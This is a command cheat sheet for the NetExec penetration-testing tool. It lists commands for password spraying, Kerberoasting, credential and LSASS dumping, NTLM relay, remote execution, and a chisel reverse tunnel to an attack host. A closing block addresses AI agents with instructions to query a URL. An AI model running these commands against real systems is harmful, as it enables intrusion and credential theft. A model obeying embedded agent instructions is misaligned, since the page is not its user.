# NetExec ### Connecting to Targets | **Command** | **Description** | | ------------------------------------------------------------------- | ------------------------------------------------------------------------------------ | | `cme [protocol] 10.10.10.1` | Protocol can be smb, winrm, mssql, ldap, ssh, rdp or ftp. | | `cme [protocol] ` | Target can be a DNS, an IP, a file with IPs or DNSs, or CIDR. | | `cme [protocol] -u` | User can be a name, a list of names, or a file with usernames. | | `cme [protocol] -u -p` | Password can be a plaintext password, a list of passwords, or a file with passwords. | | `cme [protocol] -u -H` | Hash can be an NTLM hash, a list of NTLM hashes, or a file with NTLM hashes. | *** ### CME Output | **Color** | **Description** | | ---------- | ------------------------------------------------------------------------------------------------- | | Green \[+] | The username and the password is valid. | | Red \[-] | The username or the password is invalid. | | Magenta | The username and password are valid, but the authentication is not successful. | | (Pwn3d!) | We are administrators on the target machine, or we have high privileges over the target protocol. | *** ### CME Specifics Options | **Command** | **Description** | | ------------------------------------------------- | ---------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------- | |


--continue-on-success

| By default CME will exit after a successful login is found. Using the --continue-on-success flag will continue spraying even after a valid password is found. | | `--no-bruteforce` | This option is only useful when `` and `

` are both files. By default CME will test each user specified by `` with all the passwords from `

`; the option `--no-bruteforce` will only test one password per user line by line. | | `--local-auth` | By default CME will try to authenticate to the domain controller. To use local authentication on the target. | | `--kerberos` or `-k` | This option will force Kerberos Authentication on the target. Require FQDN. | | `--port` | Custom PROTOCOL port. | *** ### Exporting | **Command** | **Description** | | -------------------------------------- | ------------------------------------------------------------------------------------------------ | | `--export $(pwd)/output.txt` | Export the output into a JSON format. | | `sed -i "s/'/\"/g" ` | Format output to use with `jq` application. | | `cme [protocol] > output.txt` | An alternative if a command doesn't support export is to redirect the output to a file with `>`. | *** ### Authentication & Password Spraying | **Command** | **Description** | | ------------------------------------------------------------- | ---------------------------------------------------------------------------------------------------------------------------------------------------- | | `cme smb -u 'nop' -p '` | Testing anonymous logon. | | `cme smb -u -p/-H

/` | Testing Domain authentication on the target. | | `cme smb -u -p/-H

/ --continue-on-success` | Testing Domain authentication on the target, continue even if one valid credential found. | | `cme smb -u --aesKey ` | Use AES-128 or AES-256 hashes for Kerberos Authentication. | | `cme smb -u -p

--no-bruteforce` | Testing Domain authentication on the target when <\u> and <\p> are both files. | | `cme smb \\ -u \ -p

-d ` | Testing Domain authentication on the target by forcing the domain name **Add this option to all the commands above if you want to force the domain** | | `cme smb --use-kcache` | Use ccache file for Kerberos authentication. | *** ### SMB Enumeration | **Command** | **Description** | | ------------------------------------------------------ | ------------------------------------------------------------------------------------------------- | | `cme smb ` | Enumerate available hosts (OS version, SMB version, IP). | | `cme smb --gen-relay-list output.txt` | Maps the network of live hosts and saves a list of only the hosts that don't require SMB signing. | | `cme smb -u -p

--sessions` | Enumerate active sessions on the target. | | `cme smb -u -p

--shares` | Enumerate permissions on all shares of the target. | | `cme smb -u -p

--disks` | Enumerate disks on the target. | | `cme smb -u -p

--computers` | Enumerate computers on the target domain. | | `cme smb -u -p

--loggedon-users` | Enumerate logged users on the target. | | `cme smb -u -p

--users` | Enumerate domain users on the target. | | `cme smb -u -p

--rid-brute [MAX_RID]` | Enumerate users by bruteforcing the RID on the target. By default up to 4000. | | `cme smb -u -p

--loggedon-users` | Enumerate logged users on the target. | | `cme smb -u -p

--groups` | Enumerate domain groups on the target. | | `cme smb -u -p

--local-group` | Enumerate local groups on the target. | | `cme smb -u -p

--pass-pol` | Enumerate Password policy of the domain. | | `cme smb -u -p

--wmi` | Issues the specified WMI query. | | `cme smb -u -p

--wmi-namespace` | WMI Namespace (default: root\cimv2). | *** ### LDAP Enumeration | **Command** | **Description** | | ---------------------------------------------------------- | ----------------------------------------------------------------------- | | `cme ldap -u -p

--users` | Enumerate enabled domain users. | | `cme ldap -u -p

--groups` | Enumerate domain groups. | | `cme ldap -u -p

--password-not-required` | Get the list of users with flag PASSWD\_NOTREQD. | | `cme ldap -u -p

--trusted-for-delegation` | Get the list of users and computers with flag TRUSTED\_FOR\_DELEGATION. | | `cme ldap -u -p

---admin-count` | Get objets that had the value adminCount=1. | | `cme ldap -u -p

--get-sid` | Get domain sid. | | `cme ldap -u -p

--gmsa` | Enumerate GMSA passwords. | *** ### RDP Enumeration | **Command** | **Description** | | ---------------------------------------------------------- | ------------------------------------------------------------------------------ | | `cme rdp -u -p

--nla-screenshot` | If NLA is disabled it will allow you to take a screenshot of the login prompt. | | `cme rdp -u -p

--screenshot` | Enumerate active sessions on the target. | | `cme rdp -u -p

--screentime ` | Enumerate permissions on all shares of the target. | | `cme rdp -u -p

--res ` | Enumerate active sessions on the target. | *** ### Finding Accounts | **Command** | **Description** | | ----------------------------------------------------------------------------- | --------------------------------------------------------------------------------------------------- | | `cme ldap -u -p

--asreproast asreproast.out` | Retrieve the Kerberos 5 AS-REP etype 23 hash of users without Kerberos pre-authentication required. | | `cme ldap -u -p

--kerberoasting kerberoasting.out` | Retrieve the Kerberos 5 TGS-REP etype 23 hash using Kerberoasting technique. | | `hashcat -m 18200 asreproast.out /usr/share/wordlists/rockyou.txt --force` | Module for Cracking ASREPRoast. | | `hashcat -m 13100 kerberoasting.out /usr/share/wordlists/rockyou.txt --force` | Module for Cracking ASREPRoast. | *** ### MSSQL Enumeration and Attacks | **Command** | **Description** | | ------------------------------------------------------------------------------------------------------ | --------------------------------------------------------------------------------------------- | | `cme mssql -u -p

-q ` | Perform an SQL Query againts the target machine. | | `cme mssql -u -p

-x ` | Executing Windows command on the target if the option `xp_cmdshell` is available to the user. | | `cme mssql -u -p

-M mssql_priv` | Enumerates MSSQL privileges to scale from a standard user into a sysadmin. | | `cme mssql -u -p

-M mssql_priv -o ACTION=privesc` | Exploit MSSQL privileges to scale from a standard user into a sysadmin. | | `cme mssql -u -p

-M mssql_priv -o ACTION=rollback` | Rollback user's privileges to standard user. | | `cme mssql -u -p

--share --get-file ` | Get a remote file from a shared folder. | | `cme mssql -u -p

--share --put-file ` | Put a local file into a remote location. | *** ### Domain Enumeration | **Command** | **Description** | | ------------------------------------------------- | -------------------------------------------------------------------------------------------------------------------- | | `cme smb -u -p

-M gpp_password` | Retrieves the plaintext password and other information for accounts pushed through Group Policy Preferences (GPP). | | `cme smb -u -p

-M gpp_autologin` | Searches the domain controller for registry.xml to find autologin information and returns the username and password. | *** ### File Operations | **Command** | **Description** | | ---------------------------------------------------------------------------------------------------- | ------------------------------------------------------------------------------------------------------------------------------------------------------- | | `cme smb -u -p

--spider --pattern ` | Search in a remote share for a pattern. | | `cme smb -u -p

--spider --regex ` | Search in a remote share using regular expression. | | `cme smb -u -p

--spider --content` | Enable content search. Can be combined with --pattern or --regex. | | `cme smb -u -p

--share --get-file ` | Get a remote file from a shared folder. | | `cme smb -u -p

--share --put-file ` | Put a local file into a remote location. | | `cme smb -u -p

-M spider_plus -o EXCLUDE_DIR=IPC$,print$,NETLOGON,SYSVOL` | Creates a file containing the shares and files information. We can add the option EXCLUDE\_DIR to prevent it from looking into specific shared folders. | | `cme smb -u -p

-M spider_plus -o READ_ONLY=false` | Download all files from all shared folder. | *** ### Using Proxychains and Chisel | **Command** | **Description** | | ------------------------------------------------------------------------------------------------ | ---------------------------------------------------------- | | `chisel server --reverse` | Method #1 - Using our attack host as the chisel server. | | `cme smb -u -p

-x "C:\Windows\Temp\chisel.exe client 10.10.14.33:8080 R:socks"` | Method #1 - Using the target machine as the Chisel client. | | `cme smb -u -p

-x "C:\Windows\Temp\chisel.exe server --socks5"` | Method #2 - Using the target machine as the Chisel server. | | `chisel client 10.129.204.133:8080 socks` | Method #2 - Using our attack host as the Chisel client. | *** ### Stealing Hashes | **Command** | **Description** | | ------------------------------------------------------------------------------------------------------------------ | ----------------------------------------------------------------------------------------------------------------------------------------- | | `cme smb -u -p

-M slinky -o SERVER= NAME= -smb2support --no-http` | Relay NTLMv2 to the target machine. | | `cme smb -u -p

-M slinky -o SERVER= NAME= -u -p

-M drop-sc -o URL=\\\\\\secret SHARE= FILENAME=` | Creates a .searchConnector-ms with an attribute containing a UNC path to the specified SMB server in the selected shared folder. | | `cme smb -u -p

-M drop-sc -o CLEANUP=True FILENAME=` | Search and delete the .searchConnector-ms file in the selected shared folder. | *** ### Command Execution | **Command** | **Description** | | ------------------------------------------------------------------- | --------------------------------------------------------------------------- | | `cme smb -u -p

-x ` | Execute the CMD on the target. | | `cme smb -u -p

-X ` | Execute Powershell on the target. | | `cme winrm -u -p

-x ` | Execute the CMD on the target using WinRM protocol. | | `cme winrm -u -p

-X ` | Execute the Powershell on the target using WinRM protocol. | | `cme ssh -u -p

-x ` | Executing remote command on the target. | | `cme ssh -u -p

--key-file -x ` | Using private keys as the authentication method. | | `--exec-method ` | Method to execute the command. Ignored if in MSSQL mode (default: wmiexec). | | `--amsi-bypass ` | File with a custom AMSI bypass. | *** ### Extracting Secrets | **Command** | **Description** | | ---------------------------------------------- | ------------------------------------------------------------ | | `cme smb -u -p

--sam` | Dump SAM on the target. | | `cme smb -u -p

--lsa` | Dump LSA on the target. | | `cme smb -u -p

--ntds` | Dump NTDS.dit on the domain controller using drsuapi method. | | `cme smb -u -p

--ntds vss` | Dump NTDS.dit on the domain controller using the VSS method. | | `cme smb -u -p

-M lsassy` | Dump the memory of the LSASS process with lsassy. | | `cme smb -u -p

-M procdump` | Dump the memory of the LSASS process with procdump. | | `cme smb -u -p

-M handlekatz` | Dump the memory of the LSASS process with handlekatz. | | `cme smb -u -p

-M nanodump` | Dump the memory of the LSASS process with nanodump. | *** ### Popular Modules | **Command** | **Description** | | ------------------------------------------------------------------------------------------------------------ | ------------------------------------------------------------ | | `cme [protocol] -M --options` | Show module options. | | `cme ldap -u -p

-M get-network -o ALL=true` | Get DNS and IP information. | | `cme ldap -u -p

-M laps` | Retrieve all computers an account has access to read. | | `cme ldap -u -p

-M maq` | Get the machine account quota for a user. | | `cme ldap -u -p

-M daclread -o TARGET= ACTION=` | Read all ACEs of the target account. | | `cme ldap -u -p

-M daclread -o TARGET_DN= ACTION=read RIGHTS=DCSync` | Read all objects with DCSync privileges. | | `cme smb -u -p

-M keepass_discover` | Locate the KeePass configuration file in the target machine. | | `cme smb -u -p

-M keepass_trigger -o ACTION=ALL KEEPASS_CONFIG_PATH=` | Perform a chain attack to obtain the KeePass database. | | `cme smb -u -p

-M rdp -o ACTION=` | Enable or Disable RDP. | *** ### Vulnerability Scan Modules | **Command** | **Description** | | ------------------------------------------------ | --------------------------------------------------------------------------------------------------------------- | | `cme smb -M Zerologon` | Module to check if the DC is vulnerable to Zerologon, aka CVE-2020-1472. | | `cme smb -M PetitPotam` | Module to check if the DC is vulnerable to PetitPotam, credit to @topotam. | | `cme smb -M ms17-010` | Module to check if the target is vulnerable to MS17-010. | | `cme smb -u -p

-M nopac` | Check if the DC is vulnerable to CVE-2021-42278 and CVE-2021-42287 to impersonate DA from standard domain user. | | `cme smb -u -p

-M dfscoerce` | Module to check if the DC is vulnerable to DFSCocerc, credit to @filip\_dragovic/@Wh04m1001 and @topotam. | | `cme smb -u -p

-M shadowcoerce` | Module to check if the target is vulnerable to ShadowCoerce, credit to @Shutdown and @topotam. | *** ### CMEDB Commands | **Command** | **Description** | | -------------------------------------------------- | ----------------------------------------------------------------- | | `workspace list` | List workspaces. | | `workspace ` | Switch to an specific workspace. | | `proto ` | Access protocol database. | | `creds` | Display plaintext and hashes credentials for a specific protocol. | | `creds plaintext` | Display plaintext credentials for a specific protocol. | | `creds hash` | Display hashes credentials for a specific protocol. | | `creds ` | Display credentials for specific user. | | `creds add` | Manually add a user to the database. | | `creds remove` | Manually remove a user from the database. | | `hosts` | Display the computers to which we have gained access. | | `shares` | Display shared folder information. | | `export creds ` | Export credentials. | | `export shares ` | Export shared folders. | | `export local_admins ` | Export Local Admins information. | --- # Agent Instructions: Querying This Documentation If you need additional information that is not directly available in this page, you can query the documentation dynamically by asking a question. Perform an HTTP GET request on the current page URL with the `ask` query parameter: ``` GET https://notes.dado1513.dev/tools/netexec.md?ask= ``` The question should be specific, self-contained, and written in natural language. The response will contain a direct answer to the question and relevant excerpts and sources from the documentation. Use this mechanism when the answer is not explicitly present in the current page, you need clarification or additional context, or you want to retrieve related documentation sections.